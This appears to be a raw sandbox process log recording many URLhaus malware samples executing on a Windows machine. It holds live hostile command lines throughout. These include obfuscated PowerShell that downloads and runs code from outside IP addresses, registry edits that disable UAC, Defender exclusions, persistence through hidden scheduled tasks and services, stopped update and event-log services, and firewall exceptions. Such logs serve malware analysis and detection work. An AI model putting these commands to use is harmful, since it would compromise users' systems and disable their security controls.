C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E0E.tmp\3E0F.tmp\3E10.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4467.tmp\4477.tmp\4478.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd1a2946f8,0x7ffd1a294708,0x7ffd1a294718

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Users\Admin\DOWNLO~1\URLHAU~1\PowerShell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffd1851cc40,0x7ffd1851cc4c,0x7ffd1851cc58

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted')

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"

C:\Users\Admin\AppData\Local\Temp\is-GSMT9.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GSMT9.tmp\ClientServices.tmp" /SL5="$304A2,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\AppData\Roaming\PowerShell.exe

"C:\Users\Admin\AppData\Roaming\PowerShell.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2320,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2316 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2492 /prefetch:8

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\HollowSwallow.dll"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll' }) { exit 0 } else { exit 1 }"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1076 -ip 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1076 -ip 1076

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1552

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"

C:\Users\Admin\Downloads\UrlHausFiles\stories.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"

C:\Users\Admin\AppData\Local\Temp\is-K0VKJ.tmp\stories.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K0VKJ.tmp\stories.tmp" /SL5="$2050C,3300090,54272,C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe

C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe

C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe"

C:\Users\Admin\Downloads\UrlHausFiles\4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4.exe"

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dbdzkqmG.cmd" "

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 4726' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network4726Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\AppData\Local\palladiums\translucently.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x44c 0x480

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{E521CF46-287D-426C-F1A1-1D45718E3044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe

"C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Users\Admin\AppData\Roaming\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\666.exe

"C:\Users\Admin\Downloads\UrlHausFiles\666.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe

"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe"

C:\Users\Admin\AppData\Local\Temp\nsl2CB4.tmp\FiddlerSetup.exe

"C:\Users\Admin\AppData\Local\Temp\nsl2CB4.tmp\FiddlerSetup.exe" /D=

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl.exe /y C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe /d C:\\Users\\Public\\Libraries\\Gmqkzdbd.PIF /o

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\System32\colorcpl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3832 -ip 3832

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 1772

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKJKJJDBKEGI" & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c timeout /t 10 & rd /s /q C:\ProgramData\JKJKJJDBKEGI & exit

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0D5.tmp\C0D6.tmp\C0D7.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\C0D5.tmp\C0D6.tmp\C0D7.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE"

C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE

C:\Users\Admin\AppData\Roaming\PowerShell.exe

"C:\Users\Admin\AppData\Roaming\PowerShell.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"

C:\Windows\system32\whoami.exe

whoami

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd36cdcc40,0x7ffd36cdcc4c,0x7ffd36cdcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2344,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2340 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1776,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2392 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4596 /prefetch:1

C:\Windows\svchost.com

